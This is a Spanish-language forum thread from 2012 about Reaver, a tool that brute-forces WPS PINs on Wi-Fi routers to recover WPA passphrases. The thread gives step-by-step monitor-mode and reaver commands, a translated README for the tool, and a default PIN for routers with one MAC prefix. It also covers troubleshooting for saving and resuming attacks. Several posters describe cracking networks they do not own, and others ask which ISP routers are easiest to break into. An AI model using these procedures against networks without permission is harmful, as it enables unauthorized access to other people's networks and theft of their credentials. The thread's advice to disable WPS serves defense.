Foro de elhacker.net

Seguridad Informática => Wireless en Linux => Mensaje iniciado por: ChimoC en 15 Enero 2012, 02:25 am



Título: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 15 Enero 2012, 02:25 am
Buenas:

Hemos estado hablando del tema pero no hemos hecho ningun post :silbar:

Reaver lo podeis descargar aqui http://code.google.com/p/reaver-wps/downloads/list o bien usarlo con wifiway (que ya lo lleva incorporado)

1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables (actualmente es wash  sin "l")

Walsh v1.3

Required Arguments:
 -i, --interface=<iface> Interface to capture packets on
 -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
 -c, --channel=<num> Channel to listen on [auto]
 -o, --out-file=<file> Write data to file
 -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
 -C, --ignore-fcs Ignore frame checksum errors
 -5, --5ghz Use 5GHz 802.11 channels
 -s, --scan Use scan mode
 -u, --survey Use survey mode [default]
 -h, --help Show help

Ejemplo de uso: walsh -i mon0 (actualmente sería wash -i mon0)

Scanning for supported APs...

00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX

Lo debeis parar con control+c

2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)

Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv

Resultado

  • 94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)
  • WPS PIN: '5XXXXXXX'
  • WPA PSK: '1XXXXXXXXX'
  • AP SSID: 'ONOXXXX'

Así que ya sabeis que debeis deshabilitar el WPS de vuestro router

Un saludo

ChimoC

P.D.: Si tecleais

reaver --man

Os saldrán más cosillas
-------------------------------------------------------------------

CHIPSETS SOPORTADOS:

Atheros AR2425 (ath5k)
Atheros AR5212
Atheros AR5213A
Atheros AR542x
Atheros AR9271 (Perfecto)
rtl8187L
rtl8187B
rtl8188ru
rtl8192cu
carl19170
ipw2000
rt2800pci
Intel 3945ABG
Intel 5100
iwl3954
iwl4965
zd1211rw

CHIPSETS CON SOPORTE PARCIAL:

ath5k
iwlagn
rtl2800usb (con compat-wireless)
b43 (Broadcom BCM4312 card)
rt73 (con driver rt2501usb)
rt2800usb (con compat-wireless-2011-12-30)
rtl819x
iwl4965
rtl8188ru
rtl8192cu

CHIPSETS NO SOPORTADOS:


iwl4965
RT3070L
Netgear WG111v3
rt2800usb (RTL3070)
rt2500
rt2570
Ipw2200
RT73usb
BCM4322
zd1211usb



--------------------------------------------------------------------

Un ejemplo del user GARCAD


Se puede usar el binario de walsh 1.3 en wifiway 3.4 perfectamente desde el directorio por ejemplo /root al mismo tiempo que tener instalada la version 1.4

Para los que les quede duda, mas rapido en mi caso imposible 5 segundos.

Código:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'nXXXXXXXXXXXXXX0'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.
Yo el proceso lo hago del siguiente modo.

Pongo en modo monitor el adaptador

Código:
# airmon-ng start wlan0

Me crea un clon mon0

Necesito saber el canal que emite mi router por lo que utilizo el siguiente comando para capturar el trafico con airodump-ng y visualizar el canal

Código:
# airodump-ng mon0

Cuando se en el canal que emite, cierro la ventana y sigo con...

Código:
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO

Cuando termina el proceso de capturar abrimos con Wireshark el archivo wps-test.cab.

Yo ya se que lo tengo activado, pero como han explicado como mirarlo con Wireskark sigo con el mismo rol.

Buscamos un broadcast de nuestro router como se puede ver en la siguiente imagen.

(http://img440.imageshack.us/img440/4084/wpsm.png)

Localizamos WPS y si esta activo o no lo esta.

Si Wifi Protected Setup visualizamos 0x02 esta activo se puede mirar si es vulnerable, si vemos 0x01 esta en modo manual, desactivado.

Como esta activada la protección con Wireskark en el archivo *.cap podemos ver 0x02 puedo empezar el ataque con el reaver.

Código:
# reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv

Salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 18 Enero 2012, 01:13 am
ChimoC ( es que ahora no puedo probarlo ) el walsh viene con el reaven???  es que no me fije cuando lo probe.
En caso que no venga, tienes el enlace de donde bajarlo???


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 18 Enero 2012, 15:22 pm
Buenas:

Vienen juntos ;), con instalar reaver ya se instala walsh

Un saludo

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 18 Enero 2012, 21:06 pm
Buenas:

Contra los routers con MAC 00:19:15:XXXXXX de WLAN_XXXX el pin por defecto es 12345670 y la clave salta en cuestión de segundos

A partir de reaver 1.4 el primer pin que prueba es 12345670, con versiones anteriores lo puedes poner a mano

reaver -i mon0 -b BSSID -p 12345670 -vv

Un saludo

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 18 Enero 2012, 21:37 pm
12345670...  anda que ya les vale...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: juanpaqui en 20 Enero 2012, 20:03 pm
Hola y saludos a todos, yo estoy utilizando la version de reaver 1.4 tarjeta alfa 1w realtek 8187L y cuando llega al 99.99% probando pines se cuelga y se queda ahí , que puede pasar, alguna solución,,,,, gracias a todos,,,,,,por el gran foro,,,,,


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Sh4k4 en 20 Enero 2012, 21:33 pm
Citar
1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables

No seria mas correcto decir que:
1.- Walsh --> Lo que hace es detectar que Aps que tienen WPS(no todos, aun) pero eso no quiere decir que sean vulnerables o que el WPS este ON cuando podria estar OFF.

Es correcta mi afirmacion?



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ragtap en 23 Enero 2012, 02:21 am
Hola,

Estoy haciendo pruebas con un USB RT2570 que usa el driver RT2500. No esta en la lista oficial de compatibles, pero mucha gente esta reportando que funciona sin problemas.

Tengo con buena señal una WLAN_XXXX y MAC: 00:19:15 pero siempre obtengo esta respuesta:

  • Waiting for beacon from XX:XX:XX:XX:XX
  • Switching mon0 to channel 6
  • Associated with XX:XX:XX:XX:XX (ESSID: xxxxxxxx)
  • Trying pin 12345670
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request

y no cambia de este estado...

¿Que creeis que puede ser?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 23 Enero 2012, 10:38 am
Buenas:

Fuente original

http://code.google.com/p/reaver-wps/wiki/README

Autor traduccion: gpain (http://foro.seguridadwireless.net/profile/?u=132181)

Zona de Descarga


http://code.google.com/p/reaver-wps/downloads/list

Ultima version

http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz
SHA1 Checksum: 408a4d4cd5051d290a68c140d3351acbf32dc4a7

Incluido en wifiway 3.4, unica live del mundo que lo incorpora de serie
DESCARGA OFICIAL: http://download.wifislax.com/wifiway-3.4.iso
MD5: 3e0645da12d5bbbdb4dd335c891e2866

Observaciones
Puedes copiar este manual en todos los sitios que deseis, solo pedimos que por favor
mantengais el autor de la traduccion gpain


Resumen

Reaver lleva a cabo un ataque de fuerza bruta contra el número pin de la configuración protegida del punto de acceso wifi. Una vez que el pin WPS es encontrado, la WPA PSK puede ser recuperada y alternativamente la configuración inalámbrica del AP puede ser reconfigurada.

Aunque reaver no soporta la reconfiguración del AP, se puede conseguir con el wpa_supplicant una vez el pin WPS es conocido.

DESCRIPCIÓN

Reaver tiene como objectivo la funcionalidad externa de "registrador" requerida por la especificación de configuración inalámbrica protegida. Los puntos de acceso proveerán "registradores" autenticados con su configuración inalámbrica actual (incluyendo la WPA PSK), y también aceptaran una nueva configuración del registro.

Con el fin de autenticarse como "registrador", el "registrador" debe probar su conocimiento del número pin de 8 dígitos del AP. Los "registradores" deberían autenticarse a sí mismos al AP sin importar cuando sin la interacción del usuario.

A causa de que el protocolo WPS es conducido sobre EAP, el "registrador" sólo necesita estar asociado con el AP y ningún conocimiento previo del cifrado inalámbrico o de la configuración.

Reaver lleva acabo un ataque de fuerza bruta contra el AP, probando cada posible combinación para adivinar el número pin de 8 dígitos del AP. Desde que los números pin son entéramente numéricos, hay 10^8 (100.000.000) posibles valores para cualquier número pin. Sin embargo, como el último dígito del pin es un valor checksum (de comprobación) que puede ser calculado en base a los 7 dígitos previos, la posibles claves son reducidas a 10^7 (10,000,000) valores posibles.

Las posibles llaves son reducidas incluso más debido al hecho de que el protocolo de autentificación WPS corta el pin por la mitad y valida cada mitad individualmente. Eso significa que hay 10^4 (10.000) posibles valores para la primera mitad del pin y 10^3 (1.000) posibles valores para la segunda mitad del pin, contando el último dígito de comprobación del pin.

Reaver hace fuerza bruta a la primera mitad del pin y luego a la segunda mitad, provocando que todos los posibles valores del número pin del WPS puedan ser puedan ser agotados en 11.000 intentos. La velocidad a la que Reaver puede probar los números pin está totalmente limitada por la velocidad a la que el AP puede procesar peticiones WPS. Algunos APs son suficientemente rápidos para que se pueda probar un pin cada segundo; otros son mas lentos y solo permiten un pin cada 10 segundos. Estadísticamente, sólo llevara la mitad del tiempo adivinar el número pin correcto.

INSTALACIÓN

Reaver sólo está soportado en la plataforma linux, requiere las librerias libpcap y libsqlite3, y puede ser construido e instalado ejecutando:

Código:
$ ./configure
 $ make
 # make install

Para desinstalar todo lo instalado/creado por Reaver:

 
Código:
# make distclean

USO

Habitualmente, el único argumento requerido para Reaver es el nombre de la interfaz y el BSSID del AP objetivo:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05

El canal y SSID (teniendo en cuenta que el SSID no esta encubierto) del AP objetivo son identificados automáticamente por Reaver, a menos que se especifique explícitamente en la línea de comando:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys

Por defecto, si el AP cambia canales, Reaver también cambiará su canal en consecuencia. Sin embargo, está característica puede ser desactivada "fijando" el canal de la interfaz.

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 --fixed

El tiempo de espera de recepción por defecto es 5 segundos. Este tiempo de espera puede ser configurado manualmente si fuera necesario (el tiempo de espera mínimo es 1 segundo):

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2

El tiempo de retraso por defecto entre intentos de pin es de 1 segundo. Este valor puede ser incrementado o decrementado a cualquiera valor entero no negativo. Un valor de cero significa sin retraso:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0

Algunos APs bloquearán temporálmente su estado WPS, normalmente durante 5 minutos o menos, cuando es detectada actividad "sospechosa". Por defecto cuando se detecta un estado bloqueado, Reaver comprobará el estado cada 315 segundos (5 minutos y 15 segundos) y no continuará haciendo fuerza bruta a los pins hasta que el estado del WPS esté desbloqueado. Esta comprobación puede ser incrementada o decrementada a cualquier valor entero no negativo:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
Para salidas adicionales, se debe proporcionar la opción "verbose". Proporcionando la opción "verbose" dos veces se incrementará el nivel de detalle y se mostrará cada número pin intentado.

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv

El tiempo de espera por defecto para recibir los mensajes de respuesta del WPS M5 y M7 es .1 segundos. Este tiempo de espera puede ser fijado manualmente si fuese necesario (tiempo de espera máximo 1 segundo).

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5

Algunas implementaciones WPS pobres tirarán la conexión, cuando se suministre un pin inválido en vez de responder con un mensaje NACK como dicen las especificaciones. Teniendo en cuenta esto, si se alcanza el tiempo de espera de mensaje M5/M7, es tratado por defecto como un NACK. Sin embargo, si se sabe que el AP envía NACKS (la mayoría lo hacen), esta característica puede ser desactivada para mayor exactitud. Esta opción está ampliamente en desuso ya que Reaver autodetectará si un AP responde adecuadamente con NACKs o no:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
Aunque a la mayoría de los APs no les importa, enviar un mensaje EAP FAIL para cerrar una sesión WPA es necesario a veces. Por defecto esta característica esta deshabilitada, pero puede habilitarse para aquellos APs que la necesiten.

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate

Cuando se encuentran 10 errores WPS consecutivos no esperados, se mostrará un mensaje de advertencia. Cómo esto es una señal de que el AP está limitado el ratio de intentos del pin o simplemente siendo desbordado, se fijará una pausa cuando aparezcan estos mensajes:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

ARCHIVOS

Lo siguiente son archivos fuente de Reaver:

 80211.c Funciones para leer, enviar y analizar trazas de gestión 802.11
 builder.c Funciones para construir paquetes y paquetes de encabezado
 config.h Generado por el script de configuración
 cracker.c Funciones principales de crackeo para Reaver.
 defs.h Encabezados comunes con la mayoría de las declaraciones y definiciones requeridas.
 exchange.c Funciones para iniciar y procesar el intercambio WPS.
 globule.c Funciones de contenedor para acceder a los ajustes globales.
 iface.c Funciones de la interfaz de red.
 init.c Funciones de inicialización.
 keys.c Contiene tablas de todos los posibles pins.
 misc.c Conversión de direcciones mac, funciones de depurado, etc
 pins.c Generación de Pin y funcione de aleatoreidad.
 send.c Funciones para enviar mensajes de respuesta WPS
 sigalrm.c Funciones para el manejo de interrupciones SIGALRM
 sigint.c Funciones para el manejo de interrupciones SIGINT
 wpscrack.c Principal archivo fuente de Reaver
 wps.h Incluye funciones para wpa_supplicant
 libwps/ Generic Librería para analizar los elementos de información WPS

Los siguientes archivos han sido cogidos de wpa_supplicant. Algunos han sido modificados a partir de sus originales.

 common/
 crypto/
 tls/
 utils/
 wps/

El directorio Iew contiene la version 29 de Wireless Tools, usada para interactuar con las extensiones inalámbricas de Linux.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: se_aviles en 23 Enero 2012, 22:14 pm
Ragtap encontraste la solucion? es que ami me pasa exactamente lo mismo. saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: heaviloto en 23 Enero 2012, 22:58 pm
hola,

OK!!!!!!!, sapoo!!!!, esta herramienta es la caña, mi enhorabuena a los creadores, solo decir que me corr.......!, de satisfaccion, je je jeje

un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 24 Enero 2012, 09:40 am
Buenas:

@ragtap y se_aviles: ¿Qué versión de reaver estais usando?

@heaviloto: A ver si quedamos con zydas  ;-)

Un saludete

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 24 Enero 2012, 12:31 pm
Buenas,Estoy usando reaver 1.4,y os queria comentar una cosa,aller lo deje atacando por la noche y al despertar veo que llebaba un 60% pero ya no avanzaba por que habia dado este error:

Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request

Como puedo parar el ataque y seguir cuando quiera? aunque apague el pc o tenga que volver a poner la tarjeta en modo monitor,he visto que se pueden generar unos archivos XZM para salvar la sesion,pero no se como se usan o donde se colocan,gracias de antemano.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 24 Enero 2012, 14:44 pm
Buenas,Estoy usando reaver 1.4,y os queria comentar una cosa,aller lo deje atacando por la noche y al despertar veo que llebaba un 60% pero ya no avanzaba por que habia dado este error:

Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request

Como puedo parar el ataque y seguir cuando quiera? aunque apague el pc o tenga que volver a poner la tarjeta en modo monitor,he visto que se pueden generar unos archivos XZM para salvar la sesion,pero no se como se usan o donde se colocan,gracias de antemano.

A mi me lo guarda pulsando control+c (parar la maquina virtual) y luego al escribir el mismo comando (reaver -i -b...)te pondra restore previous sesion, o si no te preguntara si deseas restaurar la sesion anterior


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 24 Enero 2012, 14:55 pm
Crtl+c mientras prueba los pins y se para,y luego volver a poner reaver - i mon0 -b .... -vv ??
Gracias lo pruebo ahora mismo,y para guardar el progreso aun que apague el pc sabes alguna forma? Gracias!  :)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 24 Enero 2012, 14:57 pm
a alguien mas le ha pasado que estando al 90,90% le diga wpa failed?? :rolleyes: me paso dos veces con la misma red. uso wifiway 3.4.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 24 Enero 2012, 15:01 pm
Crtl+c mientras prueba los pins y se para,y luego volver a poner reaver - i mon0 -b .... -vv ??
Gracias lo pruebo ahora mismo,y para guardar el progreso aun que apague el pc sabes alguna forma? Gracias!  :)

exacto. luego no tienes ni que escribir el comando, le das a la flecha del teclado acia arriba y facilmente jeje
La sesion se guarda con control c, guarda el progreso y todo, eso si, si tienes el linux (wifiway,etc...) instalado. si lo ejecutas en live cd, o usb no creo que se guarde.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 24 Enero 2012, 15:13 pm
exacto. luego no tienes ni que escribir el comando, le das a la flecha del teclado acia arriba y facilmente jeje
La sesion se guarda con control c, guarda el progreso y todo, eso si, si tienes el linux (wifiway,etc...) instalado. si lo ejecutas en live cd, o usb no creo que se guarde.
Gracias hombre por la ayuda,mira lo ejecuto desde VirtualBox (iso montada) y despues de atacar un router durante un rato,cuando le doy a inicio/wifiway/wpa wps/salvar avance en XZM,me sale un archivo en el escritorio supongo que hay ira el proceso,lo que ya no se es como ejecutar ese archivo para que siga probando pins por el % con el que lo pare,sabriais algo? Thanks!!  :)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 24 Enero 2012, 15:25 pm
Gracias hombre por la ayuda,mira lo ejecuto desde VirtualBox (iso montada) y despues de atacar un router durante un rato,cuando le doy a inicio/wifiway/wpa wps/salvar avance en XZM,me sale un archivo en el escritorio supongo que hay ira el proceso,lo que ya no se es como ejecutar ese archivo para que siga probando pins por el % con el que lo pare,sabriais algo? Thanks!!  :)

ese archivo lo he visto pero no se como se ejecutara. no lo he probado probado.
Pues si es iso montada no te guardara lo de control c al iniciarla de nuevo. de todos modos una solucion rapida seria buscar el archivo de la captura(no se si lo digo bien) q esta en tus documentos(con el nombre de la mac del ap) y guardarlo en usb o guardar el archivo este que me dices para luego intentar ejecutarlo.
tmb podrias instalar el wifiway en la maquina virtual pero esto ya es mas complicado jejeej nada, no cuesta ayudar, un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 24 Enero 2012, 15:47 pm
Haber si lo consigo de aqui a la noche xD,por lo pronto inicio reaver y cuando lo cierro me pone session saved,pongo de nuevo reaver -i mon0 -b .... pero no sigue por donde iba,comienza de nuevo :S probare luego haber que tal desde USB o DVD haber si es por la maquina virtual,Gracias.

El archivo ese que me dices si se guarda,en root hay un archivo XX:XX:XX:XX:XX.WPC pero no se como ejecutarlo,meto un pen pero al copiar el archivo me dice: Tipo de sistema de archivos no valido ¿? Supongo que sera por que no esta en ext y esta en ntfs o fat 32... Bueno haber si lo soluciono xD,Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 24 Enero 2012, 15:50 pm
Buenas:

Si quieres salvar la sesión le das a salvar y te saldrá un archivo en el escritorio... ese es el que deberás usar después (siempre y cuando juegues con liveusb o virtualizando )

Un saludo

ChimoC

P.D.: IMagino que usas Wifiway ?¿


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 24 Enero 2012, 15:56 pm
Buenas:

Si quieres salvar la sesión le das a salvar y te saldrá un archivo en el escritorio... ese es el que deberás usar después (siempre y cuando juegues con liveusb o virtualizando )

Un saludo

ChimoC

P.D.: IMagino que usas Wifiway ?¿

Si Wifiway 3.4

Inicio VirtualBox,pongo reaver,añado reaver -i mon0 -b MAC -vv
se pone a "trabajar"... cuando quiera pararlo le doy a Ctrl+c y se para poniendo: session saved.

Luego le doy a Inicio/Wifiway/wpa wps/salvar avance en XZM y aparece un icono en el escritorio
y me pone: Sesion reaver salvada,copia el fichero creado en la carpeta modules,ya encontre la carpeta,pero esta en el interior del dvd de wifiway asi que no puedo sobreescribir,como lo hago? Gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 24 Enero 2012, 15:59 pm
Haber si lo consigo de aqui a la noche xD,por lo pronto inicio reaver y cuando lo cierro me pone session saved,pongo de nuevo reaver -i mon0 -b .... pero no sigue por donde iba,comienza de nuevo :S probare luego haber que tal desde USB o DVD haber si es por la maquina virtual,Gracias.

El archivo ese que me dices si se guarda,en root hay un archivo XX:XX:XX:XX:XX.WPC pero no se como ejecutarlo,meto un pen pero al copiar el archivo me dice: Tipo de sistema de archivos no valido ¿? Supongo que sera por que no esta en ext y esta en ntfs o fat 32... Bueno haber si lo soluciono xD,Saludos.
si escribes reaver-i mon -b (mac ap) -s (ruta del archivo, puedes arrastrarlo para pegarlo en konsole) -vv  te funciona desde donde lo dejaste (se me olvido comentarte este comando antes)
No se si es -s o menos -f, escribe reaver en konsole y te salen todas las opciones de todas maneras. un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 24 Enero 2012, 16:02 pm
si escribes reaver-i mon -b (mac ap) -s (ruta del archivo, puedes arrastrarlo para pegarlo en konsole) -vv  te funciona desde donde lo dejaste (se me olvido comentarte este comando antes)
No se si es -s o menos -f, escribe reaver en konsole y te salen todas las opciones de todas maneras. un saludo
Ammmmmm jaja eso sera lo que me falta claro,decirle a reaver donde esta el archivo no? Bueno ahora seguire probando,dejo otra duda,hay varios routers que al atacar,solo prueba el pin 12345670,siempre ese pin,no cambia,a que se puede deber eso?? saludos peña!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 25 Enero 2012, 13:33 pm
Buenas:

Si has guardado la sesión, una vez que la vuelvas a lanzar (contra el mismo objetivo) reaver debería indicarte que tiene una sesión guardada y que si quieres usarla.

¿Dónde guardas la sesión? Prueba o bien en modulos o en base

Un saludo

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: heaviloto en 25 Enero 2012, 15:34 pm
hola,

de las pruebas que estoy realizando, decir que estoy bastante satisfecho por el momento, solo añadir que es un poquito lento ya que  las tres que e conseguido, se a tirado 5, 10 y 15 horas, pero bueno que es eso comparado con los años que llevamos esperando algo asi, seguir asi chicos, gracias por vuestro trabajo

Buenas:

@heaviloto: A ver si quedamos con zydas  ;-)

Un saludete

ChimoC


cuenta con ello ChimoC, aunque ahora esta poco ennoviado, lo rescatare, je je je je, ahh, tengo que llamarte para hacer unas recar.....as, ya sabes

un saludo, majete


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: morenazz0 en 25 Enero 2012, 16:35 pm
una pregunta... esto entonces es valido para cualquier router que traiga habilitado el WPS? mi router q es wlan_xxxx con bssid 64:68:0C:xx:xx:xx si tiene activado el wps, me podrian coger la clave aunq cambiara la q viene x defecto?
Y otra preguta aparte, esto seria valido para cualquier router con encriptacion wpa/wpa2 q tuviera activado el wps? y ademas del q tiene bssid 00:19:15:xx:xx:xx q mas routers suelen traer activada esta opcion? por ejemplo, los Huawei de vodafone_xxxx o los nuevos wpa2 de jazztel_xx lo suelen traer activado por defecto?  perdonad x tantas preguntas pero esq este ataque no lo he hecho nunca... jeje
P.D: Gracias x todo chavales, sois unas maquinass!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 25 Enero 2012, 16:43 pm
Buenas:

@morenazz0: Si, es válido para cualquier router que lo teng aactivado. Ahora bien, hay routers que SI detectan el ataque y se cierran en banda (y no lo podrás sacar) o bien alargan la solicitud de PIN... creo que podrías estar intentándolo hasta 7 días sin parar.

El bssid 64:68:0C creo que NO es vulnerable (creo que se cierra en banda)

El 00:19:15 cae en unos cuantos segundos ya que el PIN por defecto es 12345670 y es el primero que prueba reaver

Hay más routers que traen ese PIN (algo leí por internet)

Yo te puede decir que un linksys que tengo en casa ha caido (no es PIN por defecto y he tardado unas cuantas horas) un Belkin_N del curro también ha caido (dejé el poratil 11/12 horas), y el de mi cuñado también se fue a tomar viento (cayó en 8 horas, un ORANGE_XXXX)

Solución, deshabilitar WPS

@heaviloto: Ya sabes donde está mi home, me das un toque cuando quieras

Un saludo

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: morenazz0 en 25 Enero 2012, 16:47 pm
Jooder.. entonces es una gran noticia... jeje
Muchas gracias x contestar!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 26 Enero 2012, 09:33 am
Buenas:

Si has guardado la sesión, una vez que la vuelvas a lanzar (contra el mismo objetivo) reaver debería indicarte que tiene una sesión guardada y que si quieres usarla.

¿Dónde guardas la sesión? Prueba o bien en modulos o en base

Un saludo

ChimoC

Ok,Gracias por tu ayuda ChimoC,mira me ocurre una cosa haber si sabes algo,me dio aller una clave en 10-11 horas pero solo me dio la WPS KEY ¿?,a que se puede deber??

http://imageshack.us/photo/my-images/607/sinttuloyhq.png/

Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ragtap en 28 Enero 2012, 04:04 am
Buenas:

@ragtap y se_aviles: ¿Qué versión de reaver estais usando?

@heaviloto: A ver si quedamos con zydas  ;-)

Un saludete

ChimoC


Estoy utilizando la version 1.4 que viene por defecto en la WW 3.4

Añado que intentando otra red obtendo es siguiente error:
  • Trying pin 33365671
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • Sending identity response
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: E3 en 29 Enero 2012, 23:54 pm
Ami me funciona bien dos onoYYXX WPA/WPA2 wps habilitados  por los aires, uno en 7h y el otro en 15h.... Reaver recomendado lentito pero con esta seguridad de lo mejor que hay ahora. Las dos keys 10 numeros de 0-9. Para sacar esta key con dicc vamos listos 30 años


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ragtap en 30 Enero 2012, 01:18 am
E3, Que tarjeta tienes?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: E3 en 30 Enero 2012, 09:44 am
Realtek 8187 la alfa tipica


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Lenna en 6 Febrero 2012, 22:57 pm
Hola,

Soy nueva en el foro y primeramente daros la enhorabuena por la web.

Quería comentaros que he estado probando el reaver con mi propia red, la cuál tenía el WPS activado, y no hubo problemas en sacar el pass. Como dato deciros que tardó 7:15 h. Por supuesto ya desactivé el WPS =)

El problema es cuando voy a probar con otra red a ver qué ocurre. Compruebo que tiene WPS, que está activado también, y procedo con el reaver. Os paso el log:

  • Waiting for beacon from XX:XX:XX:XX:XX:XX
  • Switching mon0 to channel 9
  • Switching mon0 to channel 1
  • [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
  • Associated with 74:44:01:60:C5:BA (ESSID: ONOXXX)
  • Trying pin 12345670
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
(...)
  • Received identity request
  • Sending identity response
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
